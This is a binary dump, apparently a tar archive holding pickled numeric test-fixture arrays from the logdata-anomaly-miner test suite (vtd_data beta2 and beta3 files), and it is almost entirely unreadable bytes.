8G?X$4G?A.G?6M &G?umЭ2G?9छ4cG?fBG?ErgG?^Bs4G?PmG?_"lFe](KKKKKKKKKKKKKKKKKKKKe](KKKKKKKKKKKKKKKKKKKKee.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/beta2_data_test7000066400000000000000000000647021437606560100275330ustar00rootroot00000000000000i](](G? ڱBG?~`*hG?G?\pDG?d;?G?⧡iG?^G?WHG?S%G?0z;G?fbG?ʦqG?uv9G?GwbG?,)]G?)c!G? bVJG?7@G?X4G?띆 aG?GYG?snG?b2@G?4EG?QG?>n i9G?mMkG?1|G?*/G?U9G?;vQG?vLDG?CUB˵G?@.3G?l(hG? (OG?r,?IG?&YG?|GKG?z1&G?F3,G?;80G?FkG?AX sG?Lmy G?'F@G?hSe4G?tkWG?p5"kG?`rOG?殹aڲ G?k5!G?i 困G?9gfG?ƺAG?Љ#ZG?h'4G?9ѽl1G?YhG?A< PwG?[NG?$_G?F"YG?6G?SzSiG?ZvNG?=sG?ㆼf4G?-VG?&4E\4vG?KSG?7 qG?ZG?R7BG?KNG?51G?*cޅG?\v!4uG?'+PwG?ދ G?Y~/nG?꼡k7sG?xexG?TR[G?d4И]G?;G?Ѣ.WG?G? 5G?@G?DC7G?rnjG?nEleG?DhkG?9:G?E[*G?twG?no6G?%'6G?SOG?h);G?c?ՌG?~G?}OG?6]X%tG?0soG?tG?hv G?qG?G?[&NG?4*G?zaG?{G?)G?ɸpG?EG?S>ޮG? 0~G?rkfG?6G?R{G?Z}FG?5)SG?;\şG?5G? ؆uBG?%CG?澡 G?쁳G?}(sG?2u+UG?tΊG?!>G?ݦd)G?EoG?1  TG?F=G?-eG?VL3G?#G?֝G?| 31G?Iӳ}G?ъ PTG?,,'G?验-bG?qG?R'?G? ?SG?`TG?9G?恼G?H ukMG?Ti}G? ~efzG?ts UG?G?K1G?ûG?zjQG?#TvG?]/0G?1aȉG?m1^G?sz}G?嗔GG?'oV7G?}#o_G?dVg1uG?飅G?5ʐWG?SD^G?ڡG? G?!{XG?de~=G?\G?ʜG? G? ( G?G?o~G?.KG?NG?C{oG?O>G?y3G?:XG?u LG? MG?(G? G?}OG?➘G?N:G?;G?oG?84G?kӔDG? G?<%G?搢$G?vtG?_kMG?:H!G?ª".\G?>G?%D G?բL'G?B$ `G?Pؿo+G?c\GG?-dG?C)+G?/^+OG?GȦ5G? UG?qp/ G?"G? G?a׺>*G?+Y 5G?'vG?깔uG?={4WG?zKvd4G?7>IG?BZG?8;1yZG?RJUwG?h4%G?ه&ae9G?߷G?gG?3*G?&_^~G?҆ϬG?zG?apg+G?G?WXkG?ۈG?2\sG?LiUG?/(xG?)T_G?ׯJG?ڵQ\G?G?-zkG? %hG?\JG?}#?G?嘵G?73G?TRD"XG?w(šG? 8G?[3G?@LG?DG?8R G?㞺=xG?PG?UKĐG?d8G?g<&G?AG?5a0ЅG?s9WVG?8$\$RpG?`o{G?G? _G?߰JVhG?7x,G?L|G?;GG?`^Q@G?"5MG?,gG?+ G?wG?(G?^^GG?؝S*GG?޻_G?`G?}loG?4s`G?ԸQ^G?mwG?͊G?~j!G?$GMG?DA #G?}4G?T8[G?4i<`bG? {,QG?,cG?ٞ/G?TSfwG?xG?Ef$9G?_cG? SjbG?OV3G?ԌG?QG?|52՛G?_tJG?e/[G?67FG?;bG?{G?wG?+ةjiG?}6}-G?IG?aG?kkHG? G? nPmG?aG?I6ޢG?dajG?G?{zG?l3G?xŬG?6؏lG?$rBG?\st.oG?8 tG?4]G?`~tG?^QG?`MyG?QFrBG?@?G?PFG?N,JG? G?:/ZG?A{G?1 (RG?ݫ*f^G?滷#G? a/@G?QJPG?Yn5G?^PG?CA]G?.ȑG?uG?+PBG? 2AbG?yRaG?N"qG?j*>G?B:NG?-=G?bG?yG?謨GNG? uIG?#*ؒG?>&G? rG?0G?2pG? G?2<%G?\HwXG?jXtG?ՠG?G?u#ҾG?KjLG?`G?(` G?u0G? ,G?hG?{渓G?NuaG?: G?hG?)* G?P?G?YgȇG?EG?G?X>nG?ꖘQG?h`G?詽ňG?cȥXAG?*|kG?G?)R/NG?袕y G?}5OG?}D[G?B y]G? 4WG? <\G?̝G?;`:G?S_OG?]_/G?&F!G?]BT(G?l-G?BExG?OKG?< خ,G?stpG?|G?P`MG?Ne,G?''*G?}G?{jG?$(֒jG?~05G?Fo.G?duG?DOG?jR*AG?{aG?ma_wG?ʒ{yG?VAG?yGLG?Ꮏ~;G?`^n5G?G?Z1!%G?apq7G?cIG?ŽE G?a4oG? j6G?U eG?;\m'G?qWG?$ 9_G?`RfG?ë%G?5G?ymG?@uG?IG?UFG?J$aG?~{)G?ZiG?xT3G?G?U ^DG?[FG?s{0}G?eL l]G?D7eG?UG?])G? 96G?%5ݴG?b:yG?)_ G?z/7 G?e G?T aG?6eĤ| G?UG?⊶G?oّG?SG?>G?ݓ703G?*%?G?OM]WG?6FG?3~<_G?M98G?x*bG?xAG?K G?0KG?쒶S@G?鎪G?іG?0yG?\;G?⸚4`G?išG?οBG?鏐Ӣ-G?0{;G?!Y -G? 䩗MG?\G?bؤWG?S]LG?trV G?MJ=-G?ye^Ae(G? G?#X^G?jkG?sɏG? 뜤ʆG?9\$G?oe+G?>G?xͳG?tTBG?G%IG?n}%G?])*KG?˦P,G?$u8G?Zg;G?{~vG?0ހPG?RvG?kG?P}xXG?:G?;:DeG?G?\,&G?&FG? DMNG?G?yG?YkG?0G?aN|G?(G?-TIG?ys4IG? FG?C"m0G?`h}G?58.G?ȱ(,G?\G?)(0G?GG?ls'G? 2G?k&G?aG?CG?G?Uxh0G?#`G?ۂ~MG?/0VG?҈)G?ԩߒvh G?~&G?R$7|+G?c(G?Qd8G?/G?jIHG?Z~G?w|SG?mWG?(W2mG?̪mG?SIÜG? T-{dG??-=G?f$;5G?麨t^!G?|f>G?"zdG?댞1DG?YG?g@RQG?偂LmG?U SG?g޷3G?RG?枣@OG?|G?%%G?zG?~!G?W'&G?3yG?ѺG?MG?UwG?3LӏoG? }|)fG?ş G?ɓ|=G? G?@I_G?AG?fG?= ϋfG? ÐG?/:nG? =G?VG?㙝%G?G?IG?Lz-G?1 G?jG?IwG?شeL7G?ꐯG?<\3G?cG?P!4G? IvG?JF0G?sG?*/91G?.B)i5G?І)K2G?#TPG?ŕ G?$G?mG? m9G? vG?K:(G?X 秽tG?]G?. ],G?PmKG?꬯G?틕ۈjG?Y2NG?G?{:۱G?ܔg$G?J?G?]G?zJG?ɝ$7G?G?H۪G?|+X) G?K+G?띪eįG?bၮQG?h G?Z#G?WG?AWuG?k' G?AeWG?rB+sG?U6G?iJG?멇 ŬG?B儱VG?j'G?( RG?7[ HG?kbXG?>KG?랞+k!G?yG?A G?憐޵G?vOG?sYFG?^G?BdG?끒bG?E vG?$ezG?%|[G? }5nG?=R|G?>{G?fMG?OG?]w+]^bG?>ԯG?!,VG?]/G??HK0G? 9G?y4G?=!0SG?o%'G?<%%G?38rlG? .COG?f#G?H'G?kgd`/G?F|`G?#IG?cwXqG?臎{|{G?.G?Օ23G?fH#G?7F:G?H* MG?DG?eG?sG?!"G?Wsn%_G?.]G?]JG?ږkVپG?G?F 2G?Y{QG?E{G? ú|G?:m?G?-f-G?<5RrG?$GG?)(:G?T|m?G?ퟝ#MG?(q8gG?sUbmG?KsG?P}K[VG?|CHG?*ǣG?w٤Ɩ$G??͇qG?է0MG?mPG?]pG?yG?.>nG?\y%G?d G?>ce(G?ٻK !G?6G?h9QG?GG?*G?2~4ZeG?hggsG?&G?gTi6G?O;LsG?$%G?盐{)G?Y uG?^s[G?!u{G?4e%G?8{nG?;~G?aSG?N&KG?̆?RG?_G?6#yG?Vu1FG?2G?WTG?J G?C2HwG?|,eG?&G?,qѻG?'F'G? SG? ݾtG?+BAAFG??tgOG?ශ0G?Z*8G? OyG?.G?0/G?rjǛۿG?E#)?G?ф(.G?!}G?,9G?BIQG?zX'XG?E1~G?IT G?#犠G?fŇ@G?݈,HG? G?y=%G?닼kG?DJ@HDG?ćG?շ$G?炈xJG?*˷G?uG?jTG?ŷ}>G? =i8G?9W'G?BG?B+=qBG?1He`dG?]G?lfȃG?IE:G?pG?¯QG?2RǧG?+x#0yG?NiG? G?<G?>WG??G?s8G?T 3G?oG?pMG?Z4G?;q9`G?O{IG?6G?i5G?km*G?QgأG?#|G?G?䏾)G?GpAG?!$2G?$گ&G?+.G?|NoG?˸]iG?_tG?= lG?UC硗G?{%G?ʊCG? L4G?iߜG?nG?=G?`*xG?[^G?Bq=G?:g)G?N{֧kG?o G?1uG?4uG?צLMG?aG?,NG?G?隟CG?ȸpG?[[uG?m?'G?yT nG?ZG?Tpi7G?y}qG?qھG?(3.eG?uh_%}G? M`vx'G?Z/G?(,:?G?U"CG?h,JG?їO0G?гIG?wG?u3|9B4G?/ %_aG?mnJ`G?p)EG?bcG?A VG? hG?ARG?M9)TG?%'o0G?ݪG?겫G?˸GG?هîG?㡋iG?)FG?j+"G? G?+vG?GunTG?VȥG?վP 3G?Ǯ>3 aG?@!CuG?K+@wt6dG?LG?F#iG?B"?G?/WG?Yf^\G?sKG?'J0.%G?WA!G?\/YbG? )t'G?5&>}7G?3˂G?I&?G?u|G?Q&[!G?8koG?L fCBG?̼G?G?fPG?dKG?V_1G?_A?G?Ø7VG?Cʒ;}G?WG?fZ|,G?G?޺ǼG?N$G?߳vT:G?/G?U_G?o!+G?tϔG?*l}GG?\]G?*aXG?8G?$G?ݨOG?꛰ G?TQ\G?K{G? G?~+IgG?S5LG?h:#G?r7G?G?S<}(G?VP|G?>UGG?[QG?zǭG?\^eG? dG?9p@G?uG?gaoG?zv9G?AiG?\oG?Wn[_G?9~Y~G?~G?濴o}}G?EQPMG?JG? UG?棚G?txG?a#G?n׏G?弲G?xfHG?+?@G?Rn%PG?lsMSTG?+G?*G?7+G?EXG?G5G?G?%lG?^ l$G?JJ^G?n4HKG?>G?u?tJG?]:1|G?΃K%G?]sKG?]7/CG?~jG?8\XG?5" IG?A+G?c G?B'ՔG? :G?̝G?vFG?칠G?G?KAG?rLNxG?ޘQG?1c|G? G?5+G?  rG?޾G?tS\cvG?hcF=G?q^G?/"G?AgG?嵰F(G?$k ~G?3zG?Ak)ϘG?/e6G?уI?G?fJG?^iG?iS4CG?ݗ?G?,ACG?炻_ηG?|qc'G? chG?Kb&uG?KzG?swoG?%G?8ccG?fjG?/G?ڣg[G?SxqG?.; G?G?\[G?t>2 @G?LFRcyG?H`J/G?tD)G?PsG?GSG?~nG?svnG?:G?衛1G?oG?+S5G?Ɍ6SG?08LG?LyG?SG?;0G?hՆG?[/G?u3G?muG?0\G?Z;.G?)j04G?떄#LG?K=G?K3-G?0qG?esd_G?ya'hG?G?˚DG?G?%G?%fDG?{m&G?!G?;f>G? .G?67G?b ;CG?bSG?)|,G?ㄋG?ZVG?[UG?xokOG?yGG?H9G?`*G?- vG?=mG?ŃEG?r3ܧG?# G?۔Җ G?w|G?Uq`G?$#V_G?}ШsG?AwG?ݑ(yG?#[G?Sg0_G?f64G?ǝ^ɗG?aG?TG?vC>G?}FG?:G?e{G?{SG?HaB5G?ƭG?x%G?/G?'IZmG?>FCG?+\7]ݠG?䌻[G?wG?3[`G?84XG?AjJ G?>b6G?ΪDF G?5#]G?H#2G?碃G?%G?hv/G?nsOG?=#ŎfG?@7G?)e~G?{ÀG?胇-G?+.G?&QRG?쎻5G?BkG? G?; ,G?ExG?1ӱG?}&7~G?_v>EG?EfG?)G?'G?⻍7TG?bG?h>G?J;G??~G?Iw ǛG?TG9G?l$G?@$G?[*UG?녏ԼG?0PG?呈ZdG?º)G?G?D_ G?eG?47_G? ^G?idbG?,G?ꚡ. G?e\>G?f>7WG?Ifp/G?Ni8G?PG?ߣʤ_|G?`X&G?m; G?xےilG?G&pG?T1G?uR_G?ڦOoG?$puG?ЩG?(\G?nT%G? 'G?Ok-gG?dJG? iG?= -G?/`-G?CWG?NG?M-zG?G?) G?:G?&yvG?2VIG?\ЮHG?2TWG?PB>CG?ϿwG?J`G?a,\G?۷f~>G?[JhG?B .G?[G?Q }G?ڿNG?ꫡqžG?B0G?r?pG?cUG?4HqG?9G?dG?~AyG?3YG?2OG?M?G?!Е;G?NUG?ދubG?皶IG?؎G?-h G?]^UG?vG?~:eyG?l,G?G?<@>G?5G?&ه;G?շ9G?u G?K {G?<$5G?G?,cQG?žG?Y;Km'G?h6G?:]fG?,A֙ G?UXG?$VG?{G?ᛶ G?ցB_nwG?[IvG? QBG?u΀G?AG?㻀LG?NG?AG?~[G?|ˡeG??eG?NQi5G?j<nwG?rXP'G?'"G?۟[ G6G?L 9:G?WG?8v,G?iG?2G?<;G?x{xLG?Đ2[G?6/G?g̨G?LH )G?_G?r G?SG? G?M @G?7xSG?G?Ä2 G?*OKG?,`/@G?LpG?᧱;%HhG?eG?Dg:1G?fUG?ͭG?-&fShG?}KG?ZgG?cvɩ'G?zG?Yѷ~1G?ߞiG?& G?TWqStG?<[ۋ!G?G?c)7G?lC|G?y`ŔG?.9G?/ukG?}G?E40G?_IG? 88G? 5GG?%^LG?C&G?oG?d6qG?uvBG?qGMG?T`G?qG?aoG?9ZKG?铜zG?4EG?S+pG?; G?&[G? -G?};G?p,yG?-Yx)xG?߾߸G?۪cF^G?I'-G?h6G?.G?BG?@avG?/G?mon=G?뚨wKG?n-o3G?]ЌvG?nLD+G?rex憾G?YG?_$QHG?wl`VG?~4!;XG?9G?Jl 2IG?Q;7G?2G?Z‘iG?uG?^Z G??sYG?}B G?{h U G?㖠G?ddIG? +\&G?w2G?RDm}G?", ֫G?QG?ɖ>dG?[^>G?hc_t^G?yx8G?? ~G?$CeRG?]'`G?G?&G?I~3|G?:ṖG?[qG?iWG?bN_1G?L"k)7G?疊qG?օjDyG?p=DG?NG?羴\&G?VuG?7>G?lO'G?߰w[e](G?t G?ߦ3G?>=َG?,۞IG?r~G?} :4G?ӵG?uNa7G?9dG?ަG?l<{H G?p쁉G?ޡtykG?뭱.cG?_8ʄrG?7NigG?鋹G?|4>G?$WG?CtG?) AG?6,zG?@G?ɋ)oUG?"G?v,܇]G?郈-CG?6>kjG?G?3$Κ*G?N}j_G?ːZv G?z*x=G?菨5G?pPZºG?wstG?qѧG?귤MlG?'pG?i@G?N8G?BG?m@G?K$G?q/kG?a&G?}5L4;G?%4 kG?+sG?xgzG?ѽ{G?c}+!G?Ӱ]TG?q(G?M~G?(#G?눮SyvG?&lG?]4#G?U G?YFG?MG? G?QG?t9G?:,G?rjIG?D*G?xvG?ï3,G?Aʕ羿G?S DG?ϬVv[0G?cG?}S1G?싄ȽG?쵰G?Ȳ7G?8MG? HvӓG?Z3OgG?q3G? qG?ᒢpzG?:W?G?F[@G?ڂG?:tG?̏uPG?)ٙG?:4"ZG?sf5iG?XG?膜ܚ^@G?HG?mL6G?GZ;G?YG?B\G? ǰG? ]G?{:( QSG?yJG?N2G?1*E#G?TݞG?p#G?1PCG?7G?ћdZ&G?톹6`G?5G?ΒsPG?0 sDG? G?MfY=G?'fG?5G?P|{G?ذ$bp;G?ʯ1fG?m3(G?$ifaG?ݏ}G?YG?t(=G?}A G?k7OG?"DQKG?SbVOG?LϬIG?ޕT,G?ÕG?KaHMG?)ѣG?poEG?#VtG?'G?i2*G?1G?M1+G?YZG?mEG?I"?G?`G?zUpG?cdPG?8b"G?iE)ZG?Xm{\G?- i1jG?_3u +G?zbN; TG?›eG?}yG?(>g1G?oj? G?E$G?]@1G?儜G?wݮf2G? G?⎖֪;G?t_G?X G?$_&c.G?"G?O?bG?0G?BG?ϼmG?3/U+G?̱G?yl^G?YG?$G?ℜ(G?0z3G?KG?15lG?X^/bG?xو}G?)LG?$G?¸*G?CbdG?㹯)G?3옢$G?up\G?ujWS[G?!9+kG?waG?ͥG? F G?8NIG?W[G?.wG?K!G? 0ݟ9G?VHAG?|X{G?D߬G?,reG?EG?5 nG?4+IG?TN:RvG?L1G?WD|G?mϟG?CG?/)$G?au$nϾG?Kk]G?m՞G?}ggDG?XڕG?RSG?SlnG?A7G?3jG?SГG?5=!G?pnG?;G?٬շ8G?twG?IO\ G?U:G?؁G?ɖzMtG?i +G?mBG?ݴrG?VM1NG?qZwG?<)G?5l{}G?G?G?ˏG?cG?7eN.{G?UQ}G?@ ؞G?ܖdG?DG?T YG?xðNG?瓬6YYG?9pzҠG?uǼʪG?0߯AG?RPG?樊A^G?sG?쐥-G?mG?W2G?J!^G?ަ^gbG? iDG?ܰ \G?4QyG?brG?wP4G?lOtG?놼1G?> ҖG?꫇k64G?>5G?꾧WrG?囪+WG?>#eG?lN_G?9[G? ^FG?4m%G?㗴OzG?FG?MmG?rVG?!nG?1طfG?]-G?WpzoG?"W6G?]wG?[3Bf G?LUG?q? )G?xF9ߗG?]KG?邗UG?*l{iG?䘦UdihG?⼪e:rbG?ؕ*`|MG?%G?5sG?Q ]G? r}G?CX4G?>A^pKG?=dG?Y?AoG?iHc2G?ԕTG?QWG?܃ZG?Ml3G?\vG?,Y -G? +G?>z'kG?阳3G?v4G?HOG?'z AG?4xbG?ԝ6G?굽|G?@bG?m9G?>}G?轣'G?cG?U%G?n8`G?ى|ڻG? θ0G?Q6G?)AG?1G?F#U{G?G?㳫Ä0G?TG?G? gFG?̊ G?;tG?Q !G?WG?ЙzG?:6<G?Rq G?c.;B`G?`z7G?LϫaG?s@*G?uxG?6\qG?XG?vs}G? \G?ЖZidG?PzHG?V3*yUoG?^o-xG?lOG?SG?ǑJbG?O¯hG?%tG?dG?q46G?vG?VeG?#G?8\G?DT2G?L/G?yG?vpG?/ G?em0rG?F0hچG?+iG?I+G?u}qG?͐G?5k7G?]BuG?(=?܆G?7X|G?->bG?f&WG?otG?s)G?DVAG?l-$A%G??7G?̚K G?`-G?5p _G?5I.G?IjhG? G?}zuf*G?-zG?dE7G?+fG?;G?S~7G?Dq!G?eG?Z`QeGG?,G?랉ۣ5G?"4i4G?{A"G?8˔G?RqG?X-RG?H,NG?Ѩ'ːG?;%VG?G bhG?̙}Ry;G?iB\G?iG?^@iG?bG?1ùG?zVG?zXEY=G?33G?=52G?tjxG?.k"G?s/D \G?ڌ˿G?-tjTG?G?).G?[%G?$G?u~ɩG?yG?yJjRG?]`G?ݷ𐑾G? DG?ۣ&8G?+J M*eG?d(>PYG? ORy`G?vG?䃔f kG?౔kG?ꡋ~oi:G?J\G?| G?&G?&RG?rlaG?IG?G_G?E0SG?|]|}G?LTG?xG?]o G?N ?G?r]JG?eGG?jeG?=G?済Z}G?GšG?SYbUG?FoG?9(G?D{}{9G?>v G?ng] G?9揹G?R6G?]$G?)P[G?I^&G?HEG?Q8G?L{G?^M`G?8G?ܽѬdG?@G?6FqG?QG?siÔoG?Љ3iElG?%}fG?UG?kzbG?׮ZΣG?L,Hw9G?=BG?)`.G?OV5jrG?;IG?RzyG?g&ilG?[A.IG?rG?`OG?lW}:G?;.G?yLG?-i0G?H:G?xG?1H.G?DG?J@G?f`G? NM'[G?K2 G?WG?+G?(tG?2ԿwjG?ጽG?,VG?;jW+}G?n]xG?hG?٘G?䈐S&dG?igsj8+G?4KG?RZG?jyG?ؚ$G?ݮBG?x-G?e62G?xKG?hIG?OvrG?OG?篘G?\B(G?zkLG?OOG?$kBfG?ݽ!2G?JJG?(`IG?WBZG?ƀG?^>*G?άBrG? +[lG?f AG?0'@G?W([9G?LqwiG?A̴@sG?ZG?8ӮG??0FG?"G?ʼ0.G?սG?Y^#G?d6ȳG?9G?썉/G?d!1ޅ4G?㭎V}G?9wG?ՌG?SWG?G?MG?G[G?ٌG?:ث;G?ny;\G?5G?YY$G?#,G? EG?ItJG?+G?"U;VG?ߩ%HG?䶀Lj2G?ۉWG?X`G?ȬG?ѺPG?|G?垡!SG?t; G?c]G?bXG?ғ"cG?6DG?hbG?bgEG? G? wG?.)SG?tiG?a"nmG?}G{G?,G?5uG? BG?;G?弔vG?wCH@G?͌syG?eG?$azxG?A";]G?[(fG?"+5 JG?ΤG?'G?vG?sG?G?(!G? 'G?5G? e G?,;4G?hG?ݠ]u!G?G?%CG?g{OG?hBHG?EB|G?Ջ}㹘G?G?#YG?DEnwG?0ZhG? G?G?9LqQG?mhRG?'m>G?ݦ5G?G?*9G?칾G?I`DkG?c HabG?XOp@G?飚؅G?ZDB|G?ݠ jG?2q5G?utG?EG?ykuG?繦(G?:t^.G??p>GG?>lVeG?dbG? }vZG?XɎG?;veG?8=G?UG? /G? d@G?ٷ`r)G?PPG?: GG?ӻqxG?LG?( cG?ޖG?u`A2G?ګJlG?>nNxG?뷤.rG?G?n+r+YG?rI G?EðG?"B6G?4TG?ZDKG?X:f G?pG?2qG?4tfG?6 G?kb@G?A3G?N KG?P:G?9r_[FG?AG?]DwG?/EG?GG?[G?_)yG?蘎qd G?:%kbG?O`G?{,FFG?nhoG?"|WG?5ERG?qarP(G?D׳G?P>CG?Cu=J G?U}NG?蘘l=G?~k(sG?60^G?{&G?LbG?X4G?G?'\JG?UJH&G?_G?tEG?2G?f/G?F,G?=ڨMtG?4~FG?3G?VG?vG?& :PG?G G?z1G?$n G?V?^G?[ vY&G?k"KG?:'G?`L}G?G?L`$9G?(c1G?]qG?n5G?2- G?(@jLG?Wv bG?)j}6G?`1AG? &G? J/;G?I$G?儡r1G?S G8]G?6G?b~|tG?Bڨ!G? 'G?a,&,KG?*pG?i.G?ˤ9pG?YG?!C+G?h |G?C=@G? =G?,x4G?4PG?ԑEG?AgĶG?y G?PMG?VnG?ʋ 1G?~e](e](ee.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/beta3_data_test3000066400000000000000000000432761437606560100275330ustar00rootroot00000000000000F](](G?ǡD6G?.mϥG? 7N9G?JZCG? pyEG??oG?8G?yd&%G?1x/G??83G?ԸJ-G?ĢuPG?I`G?܏G?mXG?շ;G?7U'G?ʚYPG?eTn1]G?U[JG?s˛sG?,6̮G?1YwG?٪-Z[G?Pw xG?=ڷ*G?pmzG?ȜdG?$YG?QG?MH%G?R< G?QEG?gC!G? r)tG?òm\,G?rNG?_G?w4ȽG?;G?o@O2lG?͂dVG?\JG?2|G?|G? u˞`G?"AG?[. G?`IGG?>JG?чMoG?˥h.G? {<G? Wj)G? G?dh 4G?v:G?8p0=G?ПDÄG?X,MG?ť;_G?͚TG?gkBG?٢մvG?Lr6G?̺hG?כYG?J.WG?+4GdG?0թG?HeڲG?"G?7x9G?Zڪ| G?|7G?5;sG?% 4G?˭G?`G?ٺTOG?͙fG?Km?G?\}G?rz:G?~kG?c#|"G?:%bG?Ʌ-6G?#G?hL'G?R:U7G?G?ȍ0w=G?e= G?.G?QqVlG?:{%KG?g!1MwG?8,hG?8G?|#MG?vqWG?62Ñ$G?Jz~G?ӠtRG?#\G?0~VG?CvG?Ǥ(G?ŻPG?m G?x<9G?6G?ɋ0G?n&rvG?G?nuG?턆ŬG?:b3& G?ɓE@G?~ͬG?/lyG?pG? ݤ G?WbG?ԂqG?dʟRG?+G?اcG?eZJHmG?ɁOG?U G?k 0G?G#v TG?豸UsG?1 G?&G? `G?P|«G?0#G?TsFG?"?RG??VmG?G?;j.G? \lG?65tG?$  G?}U!G?Ë:!G?AJG? MN?G?7ݥG?||I)G?B7$؀G?ԓ'eG?}l7G? iG?r1G?XOJlMG?P*yHG?lr _G?܋cG?Va}G?hRG?9G?{ҦG?KG?ү% G?5G?=vN?G?㳫\`G?XG?ĐbҤG?e7G?&gG? ]ΎG?%WG?NmG?g΍ G?WG? $G?>2G? tlG? SgG?woG?޼6:G?3:G?L!&G?i!7.G?݈,„G?DVrG?v{lG?_;CG?KÔG?v2sͧG?ذkzG?,%^G?ͱKG?"bG?=ONG?6"JG?^[٫vG?Ta3\=G?кg|+G?o^s{G?ԽnG?!{G?ԙM*`G?ٗ^G?@0a:pG? 1G?<G?ם G?+fM&qG? VG? G?֮;G?r~G?[ɂG?ֽRÞG?D54qG?~nG?P2G?YdAG?ݯ G?ǣG?9hG?Я\7l9G?WqZG?L1G?z.G?IEo G?vEWG?"G??"G?zdcG?܎8ԡZG?r"G?~NUvG?|xG?nbG?2K"GG?L @2G?? G?p؇;kG?*c+|uG?P]G?"G'G?bG?Έ`DžG?,SO4G?rG?L5$4~G?7BG?=G?,yrG?g@G?ä00G?yuPG?G?5uVG?̸yuG?op9eG?e>G?_!G? qNG?ZH>G?ytzMG?L*sG?|$PPG?PsrG?pG?ڝw.rG?8G?@YG?"2)G?'ġ~G?ж+G?G?VQ9G?\L'G?ܒrl&G?rVG?I.EG?ׅ5G?5y_G?ى WG?LG?ThG?%LTi G?}ZnsG?o G?吇G?y9hWG?s G?/idGG?hASG?|G?BI>7G?aG?~-1G? >G?|%hAG?jG?Q 7G?T[G?": G?5h|G?x6\G?E̽.G?,G?l.G?аuXhG?ƿgh+G?hnHG?*cG?ޚ|حG?guG?T G?[nw'G?ܱ|y#%G?LXG?xojG?QAXG?,}՝OG?(J G?BG?P/G?Ϲo+3G?@}G? 6G?µE8-G?RHG? G?2!G?c<&iG?ѵ G?ԦWG?ί}G?Y`G?NcQG? hG?% ]XG?@vG?e%G?2hG?r{_G?ycoxG?rƢhG?+{PKG?uoG?Ƣ~aG?OoG?/yG?ڐܨlG?֋+OG?yz@G? z ~G?ĒG?ϕ{aG?S6G?ʵ,)=7>G?bc_F"G?u!UG?v`8G?6q9G?oG?3cgxG?ҘﮍG?5Lߞ G?ٰ_1G?ܖ[G?x;?2̗G?k +7zG?f$>i>2G?HלbuG?fG?фaG?zG?G?G?IG?',qG?]J IG?ϻ^G?R>G?YhrG?LJ gG?G?#@reG?i] }G?4ey G?㖏-G?SG?Y,G?.IG?ŋ]ްG?plaG?;ݛG?RR'G?C}*tG?+G?Չt%G?+vzG?%e%+מG?|XG?ѧ~\1v^G?9b(G?MG?ښTRG?Ӗ 0-TG?㮗YG?p"a9G?֑ ÛqG?mG?pDnG?cUOG?8h!ĤG? G? G?]>G?Ɠ`zG?{"G?YKG?G?u=8G?ҥMG?@xG?ѦQFG?Nj G?ɓqd;)mG?jkG? G?Ճ4)G?(z_#G?"G?ݳG?9+(G?\ʕG?w}iG?i_G?[R\G?:׾p"G?<-1qG?[HG?WG?ӥv`%{G?շ2ސG?PG?G?w'G?0ЍG?GlzG?,h9uoG?QdjWG?ɧ G?NLG?FM}G?*O>mG?ӋG?*)G?^]G?xCDG?reQG?*嫱{G?a@NG?9IG?6BwG?ӄNbmŠG?[⋘!G?,t[G?1`$(G?f5BG?6y]G?͔S&NG?`vG?ĸacG?׈QӀ G?_G?$rG?A0G?3RNAG?1LcG?O^ 2VG?iZG?-G?unǡG?ΒFG? vG?>Ŭ"G?·JtG?y={[tG?G?%G?锞G?̖=yG?FG?Q@'g:G?ڿ3QG?ŽYG?-@]G?ښW-OfG?p1UG?9uV,?G?6G?!G?@>C G?3G?Vo.@G?Ⱥ mG?d,G?u`(G?c~6B#G?HNG?"`„G? ʐG?RQHG?ⶡY'G?yR G?GG_7G? =G?uG?nw+G?u@G?`K#|G?˾URkG? ΟMG?a~MG?W,1`tG?i6G?ȝG?&Х;G?K G?KG?0\G?7|! G?ۏn^YG?slG?%QBaG?NkG?` 5G?nG?#D6G?G?թsI)G?jHLG?eSY"G?'G?bŪI{G?i7F]G?``RG?/K\耼G?xcW>G?ᐖiG?;YJG?BG?a!WlG?WVG?2G? LG?M6G?t>Z5G?ש9R^G?CnӯG?1G?3YܱG?Ğ}*BLG?zYčG?#E G?t2~G?ћ%ߚ$G?vG?ʮG?܈G?5vG?X|(G?½7jG?քuG?>ctZG?|U\G?G?LG?7ʭ G?uG?w/\G?pg<_G?ܳ3 KG? 8GG?АdajAG?Z_6G?׮· nG?!6:G?")ukG?Չ9G? >G?1٤kG?ϳM|0:G?C07G?[G?- G?՜Q9pG?UG?Iǣ*G?X G?az-G?iYPG?mZx G?ꦑG?ɀZV3G?߯pOLG?ϝ.G?EG?WqG?y.G?AqRG?$[nmG?aڷ-G?׃\mG?ƃ 0G?FxTbG?ƾ,G?nG?6#ͫG?r2qG?nSnX| G?R7wOG?M-G?G]*#G?h'}G?HeG?tzG? cu9G?a7lG?*]G?Z#G?͆G?ŦF|G?zG?>bG?M'1G?،JG?ʐ`W^c G?~Y3UG?_mG?-G?lk??G? :9@ "G?fPOG?[S-G?ѰX?tG?fCG?ϣ^eG?ޱ&G?.G?ijG?:C~G?_G?g~G?X6A~G?eBG?ū/+T G?7w_G?ӆtG?#PG?Z(.G?Ԭ3KG?@b?G?B*G?^䧿SG?).G?;׭fG?zkOG?FxG?lG?Y;G?ͽCQcG?#8G?*IG? )gG?bG?ԵvG?ЃepHG?ڝnA\bG?0wdyG?38wG?.oG? G?:G?}:G?QlgBG?yY|G?RG?b_;G?)G?vF8 G?ۥnG?֌4rG?6BUG?%! G?QZ|FG?qMZqG?gBG?r EG?q;fG?T'G?ˤ]G?Ƕ"G?*JqG?eNuBG?#HC_G?UQG?LtHG?EG?(F%1jG?щ:QG?+n"TG?EݻG?c,$G?ȀoG?(;PԼG?Ÿ*G?9$נG?!ɴG?Ѣ5:G?2Z89G?tS2G?} G?~UDG?,xfG?=*LG?#G?,?drTVG?Կi>G?y/G?ه4G?{G?qJG?C4&G?vbG?cPGTG?^v/G?X\G?᪷DG?$G?%ЪG?}R;G?|7)SG?ځu:G?7:6G?7zU G?sϩVG?œK@G?͎j,G?c:{G?sxG?چ>N-G?qG?ӛvG?)^&?G?ߘmKEG?RϵYG?ӯ$ۍG??cG?IB'2G?`(TG?ױ$^G? {4kG?wi,G?AG?`7l;aG?¯±G?vBqeG?؝zECG?e67G?Ħ *G?G?]0sAG?X8G?ZP'YdG?G?# 